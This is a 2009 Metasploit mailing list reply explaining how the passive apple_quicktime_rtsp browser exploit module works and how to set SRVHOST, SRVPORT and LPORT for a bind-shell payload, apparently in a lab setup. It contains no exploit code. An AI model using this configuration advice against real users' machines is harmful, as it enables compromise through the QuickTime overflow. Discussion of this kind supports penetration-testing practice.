Metasploit mailing list archives
query on exploit/windows/browser/apple_quicktime_rtsp
From: patrick at aushack.com (Patrick Webster)
Date: Mon, 9 Feb 2009 16:45:32 +1100
Yep, it is a passive exploit. The job is started, waiting for a vulnerable client with a browser to connect with a vulnerable version of QuickTime installed. The job will send the trigger to the client as HTML/XML, then overflow QuickTime, and the payload will connect with a session. One note: SRVHOST should be the IP that the XP box will be connecting to (the BT3 instance). SRVPORT is the HTTP server port (usually 80) If you're using shell_bind_tcp, check LPORT which is the actual port the payload will listen on. This is 4444 by default. -Patrick
Current thread:
- query on exploit/windows/browser/apple_quicktime_rtsp Nitin Kanaskar (Feb 08)
- query on exploit/windows/browser/apple_quicktime_rtsp webDEViL (Feb 08)
- query on exploit/windows/browser/apple_quicktime_rtsp Patrick Webster (Feb 08)
- query on exploit/windows/browser/apple_quicktime_rtsp Nitin Kanaskar (Feb 09)
- Message not available
- query on exploit/windows/browser/apple_quicktime_rtsp Nitin Kanaskar (Feb 09)
- query on exploit/windows/browser/apple_quicktime_rtsp H D Moore (Feb 09)
- query on exploit/windows/browser/apple_quicktime_rtsp Nitin Kanaskar (Feb 09)
- query on exploit/windows/browser/apple_quicktime_rtsp MC (Feb 09)
- query on exploit/windows/browser/apple_quicktime_rtsp Nitin Kanaskar (Feb 09)
- query on exploit/windows/browser/apple_quicktime_rtsp Patrick Webster (Feb 09)
- query on exploit/windows/browser/apple_quicktime_rtsp Patrick Webster (Feb 08)
- query on exploit/windows/browser/apple_quicktime_rtsp webDEViL (Feb 08)
- query on exploit/windows/browser/apple_quicktime_rtsp Donnie Werner (Feb 09)